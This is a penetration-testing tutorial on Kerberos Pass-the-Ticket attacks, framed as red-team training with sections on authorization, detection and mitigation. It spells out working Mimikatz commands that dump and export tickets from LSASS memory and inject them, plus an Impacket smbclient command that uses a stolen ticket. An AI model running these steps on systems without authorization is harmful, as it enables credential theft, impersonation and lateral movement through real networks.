Conducting Pass-the-Ticket Attack

What Is This

Conducting a Pass-the-Ticket (PtT) attack is an advanced lateral movement technique in cybersecurity red teaming and adversary simulation. The technique leverages the Kerberos authentication protocol, which is widely used in Windows Active Directory environments. Rather than relying on stealing or cracking user passwords, a PtT attack involves extracting valid Kerberos tickets-either Ticket Granting Tickets (TGT) or Service Tickets (TGS)-from the memory of a compromised host. Once obtained, these tickets can be injected into another session or system, enabling the attacker to impersonate the ticket holder and access network resources as that user, even without knowing their password.

This skill is essential for demonstrating how real-world attackers move laterally within compromised networks and for testing the effectiveness of defensive controls against such attacks.

Why Use It

Pass-the-Ticket attacks are particularly valuable during penetration testing and red team engagements because they mimic tactics used by advanced persistent threats (APTs). The reasons for using this technique include:

• Bypassing Credential Requirements: Attackers do not need to know or crack the user's password once they have the Kerberos ticket.
• Evasion of Detection: Since the attacker is using legitimate authentication tokens, their activity often blends in with normal user behavior, making it harder to detect.
• Privilege Escalation: If high-privilege tickets (such as those belonging to domain admins) are obtained, attackers can access sensitive systems and data.
• Testing Defensive Capabilities: Security teams can evaluate how well their monitoring and detection tools can identify and respond to PtT attacks.

How to Use It

The process of conducting a Pass-the-Ticket attack involves several steps and requires both user-level access to a compromised system and specific tools. Below is a typical workflow using popular tools like Mimikatz and Impacket.

1. Extracting Kerberos

Tickets

The first step is to extract tickets from the Local Security Authority Subsystem Service (LSASS) memory on a compromised Windows machine. Mimikatz is a widely used tool for this purpose.

Example: Extracting Tickets with Mimikatz

Open an elevated command prompt on the compromised host and run:

mimikatz.exe

Within the Mimikatz shell, execute:

privilege::debug
sekurlsa::tickets

This command lists all Kerberos tickets in the current session. To save a specific ticket:

kerberos::list /export

This will export the tickets as .kirbi files.

2. Injecting Tickets into a New

Session

After extracting the ticket, the attacker can inject it into their own session (either locally or on a different machine where they have access).

Example: Injecting a Ticket with Mimikatz

Copy the .kirbi file to the attacker’s machine and run:

mimikatz.exe

Then execute:

kerberos::ptt <path-to-ticket.kirbi>

Once injected, the attacker's current session will be able to authenticate as the ticket’s owner.

3. Accessing Network

Resources

With the ticket injected, the attacker can access services such as file shares, databases, or remote desktop sessions as the impersonated user.

Example: Using Impacket’s smbclient

If you have a valid Kerberos ticket for a privileged user:

export KRB5CCNAME=/tmp/krb5cc_<uid>
impacket-smbclient -k -no-pass <target-ip>

This command uses the Kerberos ticket for authentication, allowing access to the target system.

When to Use It

• Red Team Engagements: When simulating real-world adversary behavior in environments that use Kerberos for authentication.
• Post-Exploitation: After initial access has been gained and elevated privileges are required to move laterally or escalate privileges.
• Incident Response: For understanding the impact of a breach and how attackers may have moved through the environment.
• Security Control Validation: To assess whether existing controls can detect or mitigate PtT attacks.

Important Notes

• Authorization Is Mandatory: Only use PtT techniques in environments you own or have explicit written permission to test. Unauthorized use is illegal and unethical.
• Detection and Forensics: PtT attacks are stealthy because they use valid authentication artifacts. Blue teams should monitor for unusual ticket usage, ticket lifetimes, and logon events from unexpected sources.
• Ticket Lifespan: Kerberos tickets have a limited lifetime. Attackers must act before the ticket expires or obtain a new ticket.
• Mitigation Techniques: Implement security measures such as restricting credential caching, enforcing strong access controls, utilizing detection tools that monitor LSASS access, and enabling features like Windows Defender Credential Guard.
• Tool Use: Mimikatz and Impacket are powerful tools often flagged by security software. Their use should be carefully controlled and monitored.
• Legal Compliance: Always follow legal and organizational policies regarding penetration testing and red teaming.

By mastering the skill of conducting Pass-the-Ticket attacks, security professionals can better understand attacker methodologies and improve the security posture of their own or their clients' environments.